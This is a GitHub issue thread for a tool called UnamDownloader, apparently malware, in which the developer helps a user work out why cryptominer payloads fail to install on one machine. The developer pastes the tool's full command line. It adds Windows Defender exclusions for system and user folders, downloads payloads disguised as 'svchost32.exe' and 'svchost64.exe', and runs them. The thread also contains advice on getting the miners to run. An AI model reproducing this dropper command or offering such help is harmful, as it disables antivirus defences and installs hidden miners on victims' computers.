UnamSanctam / UnamDownloader

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Downloader breaks with ' in username #8

Closed JaxGuy closed 2 years ago

JaxGuy commented 3 years ago

A computer failed to download a file to the current directory(Desktop) but it did when I put it in the C: folder. Also, I was using the XMR and ETH miner and I believe they did not download and install because of the name too.

UnamSanctam commented 3 years ago

Hmm, it shouldn't really since it uses environmental variables to get the file paths though an apostrophe would be an escape character for Powershell. Nothing can really be done about that if that is indeed the issue. Can you post the settings here?

JaxGuy commented 3 years ago

I’m not at my pc right now, but I set up the downloader to download 2 files to the current directory and also download and execute the xmrminer and ethminer in the temp folder. When I ran it I didn’t see the 2 files that were supposed to download to the current directory until I put it in the C: drive. Even after I put it in the C: drive the miners didn’t appear to start. I don’t know the exact settings but I enabled install and checked install to system32. I checked with MinerCheck and the miners were not running so I’m assuming that the username messed up the install path of either the downloading and execution of the miners or it just broke the miners not the downloader.

UnamSanctam commented 3 years ago

Hmm, there shouldn't be any issues since it's all done by powershell. Can you post the settings you used (make a new one with the same settings you think you have) when you have a computer available?

JaxGuy commented 3 years ago

Yeah, do you want me to make a new downloader build or miner? I was able to get both to work on many other computers so I’m pretty sure it’s just this computer.

UnamSanctam commented 3 years ago

Downloader build, only real reason the miner wouldn't work was if it only had an old .NET version.

JaxGuy commented 3 years ago

I made the downloader build like 3ish days ago, it had 2 executables download to the current directory and then the xmr and eth miner both download and execute in temp. The 2 files that are supposed to download to the current directory didn't download if the path included the user name, C: worked, desktop didn't and temp didn't making the miners not run. I'll be home in an hour or two if you want me to try to make a new build and test, but I'm pretty confident I'll have the exact same result.

UnamSanctam commented 3 years ago

Hmm yes I guess it's possible if the cmd replaces %CD% before it gets input into powershell, in which case I believe I'd have to replace the %envkey% variables with $env:endkey or something similar, it is extremely bad practice to include apostrophes or quotations in any identifier which is why I didn't consider it or even knew it was actually allowed.

JaxGuy commented 3 years ago

Me neither to be honest. Even if it was possible I wouldn’t think anyone would actually use it in their name but I guess they do.

JaxGuy commented 3 years ago

Do you think you're going to be able to fix this? Also I tried using the default XMR and ETH miners without the downloader and I believe they are affected by the same problem.

UnamSanctam commented 3 years ago

Yes I've already fixed it but am also working on other things. for it. It don't think the miners should be affected since there is nothing that would be incompatible with apostrophes.

UnamSanctam commented 3 years ago

New version has been released, it should work in this one.

JaxGuy commented 3 years ago

New version has been released, it should work in this one.

I tried the new release, it appears the files don't download at all now. I tried native and managed but neither seem to work. I also tried just executing the miners directly and neither seems to be installing.

UnamSanctam commented 3 years ago

Hmm it works fine for me, can you send the downloader and miner files here?

JaxGuy commented 3 years ago

Hmm it works fine for me, can you send the downloader and miner files here?

https://file.io/sNfeXNw8ReTY password: SeCuRePaSsWoRd2!

UnamSanctam commented 3 years ago

Hmm, they all work for me just fine.

JaxGuy commented 3 years ago

I think the issue might be the ' in the username still.

UnamSanctam commented 3 years ago

Maybe, but If that's the case then that must be an inherent problem with WIndows/powershell which Microsoft would have to fix since the username isn't referenced at all in the downloader/miner except through the environmental variables.

JaxGuy commented 3 years ago

Darn, so no way to fix this?

UnamSanctam commented 3 years ago

Not if that is indeed the problem since that would be an inherent problem in Windows or powershell which only Microsoft could fix.

I will copy paste what your downloader is calling as an example: cmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path $env:Temp -ChildPath 'svchost32.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path $env:Temp -ChildPath 'svchost64.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path ($pwd).path -ChildPath 'GPU.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path ($pwd).path -ChildPath 'CPU.exe')) & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'svchost32.exe') & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'svchost64.exe') & exit

As you can see it never uses any username anywhere so if there is a problem then that lies within Windows or powershell. Keep in mind that you never execute GPU.exe or CPU.exe just so you know.

JaxGuy commented 3 years ago

Not if that is indeed the problem since that would be an inherent problem in Windows or powershell which only Microsoft could fix.

I will copy paste what your downloader is calling as an example: cmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path $env:Temp -ChildPath 'svchost32.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path $env:Temp -ChildPath 'svchost64.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path ($pwd).path -ChildPath 'GPU.exe')) & powershell (New-Object System.Net.WebClient).DownloadFile('Censored Download URL', (Join-Path -Path ($pwd).path -ChildPath 'CPU.exe')) & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'svchost32.exe') & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'svchost64.exe') & exit

As you can see it never uses any username anywhere so if there is a problem then that lies within Windows or powershell. Keep in mind that you never execute GPU.exe or CPU.exe just so you know.

I know those two never execute that is intentional. The other two are supposed to execute. It seems that it only breaks on this one computer so the only thing I can think of is the ' in the username since that is in most of the paths.

UnamSanctam commented 3 years ago

Since the commands doesn't contain anything with username then either the problem is with Windows/powershell or powershell could be disabled or something.

JaxGuy commented 3 years ago

Since the commands doesn't contain anything with username then either the problem is with Windows/powershell or powershell could be disabled or something.

I see, do you have any troubleshooting steps?

UnamSanctam commented 3 years ago

You can run the commands manually in powershell to see if you get any reponses.

JaxGuy commented 3 years ago

You can run the commands manually in powershell to see if you get any reponses.

Alright, you want me to run the command you sent above, replacing the download links with the actual ones? Also, do you have a discord?

UnamSanctam commented 3 years ago

Yes exactly, though the multi command above should be run in CMD. My Discord is Unam Sanctam#3135

JaxGuy commented 3 years ago

Yes exactly, though the multi command above should be run in CMD. My Discord is Unam Sanctam#3135

Alright, I'll try running it in powershell in a bit. I sent you a friend request on discord.